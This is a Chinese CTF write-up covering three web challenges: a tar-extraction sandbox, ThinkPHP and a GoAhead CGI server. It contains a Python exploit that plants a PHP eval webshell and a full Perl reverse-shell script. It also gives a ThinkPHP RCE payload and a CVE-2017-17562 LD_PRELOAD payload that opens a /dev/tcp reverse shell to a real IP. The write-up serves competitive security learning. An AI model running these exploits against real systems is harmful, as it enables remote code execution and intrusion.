半小时从rank1掉到rank41,觉得已经够快了。结果最后十几分钟,rank2直接掉到rank82,白旗国投降都没这么快吧= =
CVE复现 + PYB

untar

题目源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?php
$sandbox = "sandbox/" . md5($_SERVER["REMOTE_ADDR"]);
echo $sandbox."</br>";
@mkdir($sandbox);
@chdir($sandbox);
if (isset($_GET["url"]) && !preg_match('/^(http|https):\/\/.*/', $_GET["url"]))
die();
$url = str_replace("|", "", $_GET["url"]);
$data = shell_exec("GET " . escapeshellarg($url));
$info = pathinfo($_GET["filename"]);
$dir = str_replace(".", "", basename($info["dirname"]));
@mkdir($dir);
@chdir($dir);
@file_put_contents(basename($info["basename"]), $data);
shell_exec("UNTAR ".escapeshellarg(basename($info["basename"])));
highlight_file(__FILE__);

预期解

题目可以从远程服务器下载tar压缩包并且在指定目录下解压,构造软连接,可以任意读取文件,但不能读/flag。根目录存在可执行文件/readflag,可以用来读取flag。

读取apache2.conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>

<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>

<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>

<Directory ~ "/var/www/html/sandbox/[a-f0-9]{32}/">
php_flag engine off
</Directory>


#<Directory /srv/>
# Options Indexes FollowSymLinks
# AllowOverride None
# Require all granted
#</Directory>

sanbox子目录下php解析被关闭。
考虑上传shell到sandbox目录下。

思路:构造一个到/var/www/html/sandbox目录下的软连接,然后往这个软连接下写文件,解压,即可。
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
#!/usr/bin/env python3
#-*- encoding: utf-8 -*-

import requests
import string
import random
import tarfile
import io
import re

host = "183.129.189.62"
port = 16807
path = ""


def random_string(length=0x10):
return "".join([random.choice(string.ascii_letters) for i in range(length)])


def get_path():
global path
r = requests.get("http://%s:%d/" % (host, port))
path = re.search("(sandbox/[0-9a-zA-Z]{32})", r.text)
if path:
path = "/%s/" % path.group(1)
print(path)


def generate_tar(filename):
tar_filename = "jingzhe.tar"
tar = tarfile.open(tar_filename, "w", dereference=True)

random_name = "%s" % (random_string())
target = tarfile.TarInfo(name=random_name)
target.type = tarfile.SYMTYPE
target.linkname = filename
tar.addfile(target)

shell = tarfile.TarInfo(name="jingzhe.php")
payload = "<?php @eval($_POST['cmd']);?>".encode('utf-8')
shell.size = len(payload)
tar.addfile(shell, io.BytesIO(payload))
tar.close()
return random_name


def exploit(filename):
url = "http://%s:%d/?url=http://191.101.47.247/hxb/jingzhe.tar&filename=%s" % (host, port, filename)
print(requests.get(url).status_code)

url = "http://%s:%d/%s/%s" % (host, port, path, filename)
print(requests.get(url).text)


def get_flag():
url = "http://%s:%d/sandbox/jingzhe.php" % (host, port)
print(requests.post(url, data={"cmd": "system('/readflag');"}).text)


if __name__ == '__main__':
get_path()
link = generate_tar("/var/www/html/sandbox")
print(link)
exploit("233.tar")
exploit(link + "/233.tar")
get_flag()

非预期

CVE-2016-1238

当解析遇到了非定义的协议(定义的协议在perl5/LWP/Protocol下,默认支持GHTTP、cpan、data、file、ftp、gopher、http、https、loopback、mailto、nntp、nogo协议)时, 如 jingzhe://jingzhe.com, 会自动读取当前目录下的URI目录并查看是否有对应协议的pm模块并尝试eval “require xxx”,这时我们的恶意pm模块就会被执行。

在服务器预先放置一个反弹shell的脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#!/usr/bin/perl -w
# perl-reverse-shell - A Reverse Shell implementation in PERL
use strict;
use Socket;
use FileHandle;
use POSIX;
my $VERSION = "1.0";

# Where to send the reverse shell. Change these.
my $ip = '149.28.247.7';
my $port = 12345;

# Options
my $daemon = 1;
my $auth = 0; # 0 means authentication is disabled and any
# source IP can access the reverse shell
my $authorised_client_pattern = qr(^127\.0\.0\.1$);

# Declarations
my $global_page = "";
my $fake_process_name = "/usr/sbin/apache";

# Change the process name to be less conspicious
$0 = "[httpd]";

# Authenticate based on source IP address if required
if (defined($ENV{'REMOTE_ADDR'})) {
cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");

if ($auth) {
unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {
cgiprint("ERROR: Your client isn't authorised to view this page");
cgiexit();
}
}
} elsif ($auth) {
cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. Denying access");
cgiexit(0);
}

# Background and dissociate from parent process if required
if ($daemon) {
my $pid = fork();
if ($pid) {
cgiexit(0); # parent exits
}

setsid();
chdir('/');
umask(0);
}

# Make TCP connection for reverse shell
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
if (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {
cgiprint("Sent reverse shell to $ip:$port");
cgiprintpage();
} else {
cgiprint("Couldn't open reverse shell to $ip:$port: $!");
cgiexit();
}

# Redirect STDIN, STDOUT and STDERR to the TCP connection
open(STDIN, ">&SOCK");
open(STDOUT,">&SOCK");
open(STDERR,">&SOCK");
$ENV{'HISTFILE'} = '/dev/null';
system("w;uname -a;id;pwd");
exec({"/bin/sh"} ($fake_process_name, "-i"));

# Wrapper around print
sub cgiprint {
my $line = shift;
$line .= "<p>\n";
$global_page .= $line;
}

# Wrapper around exit
sub cgiexit {
cgiprintpage();
exit 0; # 0 to ensure we don't give a 500 response.
}

# Form HTTP response using all the messages gathered by cgiprint so far
sub cgiprintpage {
print "Content-Length: " . length($global_page) . "\r Connection: close\r Content-Type: text\/html\r\n\r\n" . $global_page;
}

请求?url=http://191.101.47.247/hxb/exp.pm&filename=URI/jingzhe.pm
在服务器上防置一个重定向脚本:

1
2
3
<?php
header("Location: jingzhe://jingzhe.com");
?>

请求?url=http://191.101.47.247/hxb/test.php&filename=2333
即可反弹shell。

thinkphp?

没搞懂这个题的利用点在哪,感觉是非预期= =
利用tp的rce漏洞即可获取到flag。
payload:

1
2
3
POST /

_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

大数据安全

首页提示/cgi-bin/index,访问得到返回:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
Args
ARG[0]=/home/ctf/test/cgi-bin/index

Environment Variables
AUTH_TYPE=

CONTENT_LENGTH=-1

CONTENT_TYPE=

DOCUMENT_ROOT=

GATEWAY_INTERFACE=CGI/1.1

HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

HTTP_CONNECTION=keep-alive

HTTP_HOST=183.129.189.62:21900

HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36

PATH_INFO=

PATH_TRANSLATED=

QUERY_STRING=

REMOTE_ADDR=111.42.148.163

REQUEST_METHOD=GET

REQUEST_URI=/cgi-bin/index

REMOTE_USER=

SCRIPT_NAME=/cgi-bin/index

SCRIPT_FILENAME=/home/ctf/test/cgi-bin/index

SERVER_ADDR=172.18.0.155

SERVER_NAME=172.18.0.155

SERVER_PORT=9999

SERVER_PROTOCOL=HTTP/1.1

SERVER_SOFTWARE=GoAhead/3.6.4

All Defined Environment Variables
REQUEST_METHOD=GET

HTTP_CONNECTION=keep-alive

SERVER_URL=172.18.0.155:9999

HTTP_COOKIE=PHPSESSID=b3c971cdea2227ebbe5bba38c011ac13

SERVER_NAME=172.18.0.155

SERVER_HOST=172.18.0.155

SERVER_PROTOCOL=HTTP/1.1

HTTP_ACCEPT_ENCODING=gzip, deflate

QUERY_STRING=

SCRIPT_FILENAME=/home/ctf/test/cgi-bin/index

REQUEST_URI=/cgi-bin/index

SERVER_PORT=9999

HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3

GATEWAY_INTERFACE=CGI/1.1

CONTENT_TYPE=

CONTENT_LENGTH=-1

HTTP_ACCEPT_LANGUAGE=zh-CN,zh;q=0.9,en;q=0.8

PATH_TRANSLATED=

SERVER_ADDR=172.18.0.155

REMOTE_USER=

REMOTE_ADDR=111.42.148.163

HTTP_UPGRADE_INSECURE_REQUESTS=1

SERVER_SOFTWARE=GoAhead/3.6.4

REQUEST_TRANSPORT=http

AUTH_TYPE=

HTTP_HOST=183.129.189.62:21900

HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36

SCRIPT_NAME=/cgi-bin/index

PATH_INFO=

No Query String Found
No Post Data Found

其中,SERVER_SOFTWARE=GoAhead/3.6.4,利用CVE-2017-17562直接RCE。
exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
~ cat > main.c
#include <unistd.h>
#include <stdlib.h>

static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
system("bash -c 'bash -i >& /dev/tcp/149.28.247.7/8456 0>&1 2>&1'");
write(1, "Hello: World!\n", 14);
}

$ gcc -shared -fPIC ./main.c -o payload.so
$ curl -X POST --data-binary @payload.so "http://183.129.189.62:21800/cgi-bin/index?LD_PRELOAD=/proc/self/fd/0" -i -v

反弹shell后获取flag,flag目录为/home/ctf/flag

参考资料

[hitcon2017] SSRF Me复现